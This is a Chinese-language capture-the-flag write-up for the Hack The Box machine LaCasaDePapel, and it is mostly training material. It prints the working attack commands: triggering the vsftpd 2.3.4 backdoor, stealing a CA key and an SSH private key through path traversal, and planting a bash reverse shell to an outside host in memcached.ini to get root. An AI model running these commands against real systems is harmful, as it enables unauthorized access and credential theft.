信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.131 | TCP:21,22,80,443 |
$ nmap -p- 10.10.10.131 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
| 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp open http Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open ssl/http Node.js Express framework
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after: 2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
Service Info: OS: Unix
vsftpd 2.3.4 backdoor && HTTPS
# echo '10.10.10.131 lacasadepapel.htb' >> /etc/hosts
http://lacasadepapel.htb/
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图](https://img.4awl.net/img/95/ddfa95aadfd8cbf8f7806fb3121407.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图")
https://lacasadepapel.htb/
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图1](https://img.4awl.net/img/97/82663b2f39091a7666b5de57b2bcad.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图1")
$ searchsploit vsftpd 2.3.4
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图2](https://img.4awl.net/img/e3/13f3b53c85ca19ddccd727a68e8083.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图2")
$ nc 10.10.10.131 21
user smiley:)
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图3](https://img.4awl.net/img/2a/7c3d73f88ee458acecd29ba137f204.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图3")
$ nc 10.10.10.131 6200
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图4](https://img.4awl.net/img/12/46df71ec8a674e03df225d8d727578.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图4")
CA证书
ls
show $tokyo
caKey指向了/home/nairobi/ca.key
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图5](https://img.4awl.net/img/7b/555f6d286e57a088f13b399167a574.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图5")
echo file_get_contents("/home/nairobi/ca.key")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图6](https://img.4awl.net/img/f4/7dc29587a1b7fc80944d15c79fc4b4.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图6")
$ openssl s_client -connect 10.10.10.131:443
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图7](https://img.4awl.net/img/02/29503ffcc9ccb7860b676fc5e5e349.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图7")
现在我们已经有了 CA 证书,接下来为自己创建客户端证书。首先下载服务器证书。访问 https://10.10.10.131,然后点击 URL 地址栏上的锁定图标。接着,选择“连接”>“更多信息”>“查看证书”。然后在弹出窗口中点击“详细信息”>“导出”。
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图8](https://img.4awl.net/img/55/60afcc0f4ceb852ddc5a666a236dee.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图8")
在此之前清除掉所有历史数据
$ openssl x509 -outform der -in lacasadepapelhtb.pem -out lacasadepapelhtb.crt
$ openssl genrsa -out client.key 4096
$ openssl req -new -key client.key -out client.csr
$ openssl x509 -req -in client.csr -CA lacasadepapelhtb.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
$ openssl pkcs12 -export -inkey client.key -in client.cer -out client1.p12
firefox导入该证书,并且清理浏览器缓存
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图9](https://img.4awl.net/img/78/a61a8d11c7038b2efcc57a68240c14.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图9")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图10](https://img.4awl.net/img/e6/a0088225b9bcc9802ba331c5cba702.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图10")
再次导入lacasadepapelhtb.crt
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图11](https://img.4awl.net/img/f5/e439f1e5621de1d5527197c7b55219.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图11")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图12](https://img.4awl.net/img/d9/27fe3980bdb8234fcff0c4d8a4e304.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图12")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图13](https://img.4awl.net/img/bc/356e5b5a61265e62975229d1abdc1e.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图13")
注意!:这里可能无法认证成功解决方法
删除认证记录和servers历史记录后再尝试进入,可能两个不一致导致认证失败。
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图14](https://img.4awl.net/img/da/821363255590f568e4d7bfbf951556.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图14")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图15](https://img.4awl.net/img/ac/fcfeb3e523b711b7f45f21d0fbfe42.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图15")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图16](https://img.4awl.net/img/fa/81c9fce636cdc18f5a953f3b3d4bd6.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图16")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图17](https://img.4awl.net/img/0a/9e73c5fa7650284be933f07535ccd3.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图17")
LFI
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图18](https://img.4awl.net/img/d7/9a05285d70b6388266f3776e9d6b9e.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图18")
https://lacasadepapel.htb/?path=..
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图19](https://img.4awl.net/img/03/3fe06df7dfc49a648020eb865975c2.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图19")
下载文件路径由base64构成
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图20](https://img.4awl.net/img/d7/4ef7ee7c1116eda63200bfe23f4296.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图20")
$ curl -k https://10.10.10.131/file/$(echo -n "../user.txt" | base64)
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图21](https://img.4awl.net/img/1a/38b73848cd352a50d3ae99cef9f79a.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图21")
$ curl -k https://10.10.10.131/file/$(echo -n "../.ssh/id_rsa" | base64)
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图22](https://img.4awl.net/img/98/ef1ef1cddf7380e8b3d8023468b1b4.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图22")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图23](https://img.4awl.net/img/1f/6b33b722d112fc81bea8226336add8.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图23")
$ for user in berlin dali nairobi oslo professor; do ssh -oBatchMode=yes -i /tmp/id_rsa [email protected]; done
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图24](https://img.4awl.net/img/60/caa2d3ccebc229f0a60db9c978c469.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图24")
User.txt
7ef30a1514740ecbc77b38a8480e2f74
权限提升
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图25](https://img.4awl.net/img/6b/525c8e91728c81a28cb7d20d8a25fd.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图25")
通过列举可知
memcached.ini存放了一个命令,并且以nobody身份执行/home/professor/memcached.js。不幸的是我们无法读取memcached.js内容。需要了解是哪个用户调用了memcached.ini
每一分钟PID都会改变,证明这个脚本都在运行。
lacasadepapel [/tmp]$ ./pspy64 -f
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图26](https://img.4awl.net/img/ff/8eebe02f001b5432e75bd11a9dd540.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图26")
在这个目录中,我们是具有读写执行的权限,所以可以删除memcached.ini
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图27](https://img.4awl.net/img/e7/1001e12cf641e6e7b34488673b61de.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图27")
lacasadepapel [~]$ rm memcached.ini
lacasadepapel [~]$ echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/10.10.16.24/10032 0>&1'" > memcached.ini
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图28](https://img.4awl.net/img/95/7644f622af2012a319a715fe422c42.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图28")
![[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图29](https://img.4awl.net/img/db/cc46fe95c2db909f1b041ec19e4cb4.jpg "[Meachines] [Easy] LaCasaDePapel vsftpd 2.3.4 back…插图29")
Root.txt
e2e7ca9580fed250b1e825f068117633
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
